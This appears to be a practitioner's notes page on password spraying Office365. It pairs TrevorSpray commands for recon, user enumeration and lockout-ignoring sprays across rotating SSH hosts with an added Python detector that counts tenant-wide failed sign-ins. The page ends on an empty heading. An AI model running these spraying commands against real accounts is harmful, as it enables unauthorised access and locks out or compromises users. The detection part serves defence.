Office365

A list of tools and resources that I use for password spraying Microsoft products.

Password Spraying Office365

TrevorSpray

# Installation
pip install git+https://github.com/blacklanternsecurity/trevorproxy
pip install git+https://github.com/blacklanternsecurity/trevorspray

# Perform recon against a domain
trevorspray --recon $domain

# Enumerate users via OneDrive
trevorspray --recon $domain -u $emails --threads 3

# Spray with a 10-second delay between requests
trevorspray -u $validemails -p 'Winter2022!' --delay 10

# Spray round-robin across two SSH hosts and the current system
trevorspray -u $validemails -p 'Winter2022!' --ssh root@$robin root@$robin

# Spray while ignoring account lockout (good for overnight attacks)
trevorspray -u $validemails -p $passwords --ignore-lockouts
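
Seen from the detection side, the delay and multi-source options above keep per-IP failure counts low, so the added example below counts failed sign-ins tenant-wide instead. It is not part of the original notes or of TrevorSpray; the record fields, thresholds, function names and sample data are assumptions constructed for illustration.

```python
from collections import Counter
from datetime import datetime, timedelta

# Microsoft Entra ID (Azure AD) sign-in error codes:
# 50126 = invalid username or password, 50053 = account locked by smart lockout.
FAILURE_CODES = {50126, 50053}

def detect_spray(events, window=timedelta(minutes=30), min_users=5, max_per_user=2):
    """Flag windows in which many distinct accounts each fail only a few times.
    Failures are counted tenant-wide rather than per source IP, so attempts
    spread over several addresses and paced with a delay share one window.
    """
    fails = sorted((e for e in events if e["errorCode"] in FAILURE_CODES),
                   key=lambda e: e["time"])
    alerts, start = [], 0
    for end, ev in enumerate(fails):
        while ev["time"] - fails[start]["time"] > window:
            start += 1                      # slide the window forward
        in_window = fails[start:end + 1]
        per_user = Counter(e["user"] for e in in_window)
        sprayed = sorted(u for u, n in per_user.items() if n <= max_per_user)
        if len(sprayed) >= min_users:
            alerts.append({"first_seen": in_window[0]["time"], "users": sprayed,
                           "source_ips": sorted({e["ip"] for e in in_window})})
            start = end + 1                 # one alert per burst
    return alerts

def max_failures_per_ip(events):
    """Highest failure count seen from any single address (the per-IP view)."""
    counts = Counter(e["ip"] for e in events if e["errorCode"] in FAILURE_CODES)
    return max(counts.values(), default=0)

def sample_events():
    """Constructed sign-in records: simplified fields, documentation IP ranges."""
    t0 = datetime(2022, 1, 10, 2, 0, 0)
    ips = ["192.0.2.10", "198.51.100.20", "203.0.113.30"]
    events = [  # one user mistyping a password hours earlier, then signing in
        {"time": t0 - timedelta(hours=3), "user": "alice@example.com", "ip": "192.0.2.99", "errorCode": 50126},
        {"time": t0 - timedelta(hours=3) + timedelta(seconds=20), "user": "alice@example.com", "ip": "192.0.2.99", "errorCode": 0},
    ]
    for i in range(6):  # six accounts, one failure each, 10 s apart, three sources
        events.append({"time": t0 + timedelta(seconds=10 * i), "user": f"user{i}@example.com",
                       "ip": ips[i % 3], "errorCode": 50126})
    return events

if __name__ == "__main__":
    for alert in detect_spray(sample_events()):
        print(alert)
    print("max failures from one IP:", max_failures_per_ip(sample_events()))
```

On the sample data no single address exceeds two failures, yet the tenant-wide window still raises one alert covering five accounts and three source addresses.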

Identifying Emails without OSINT
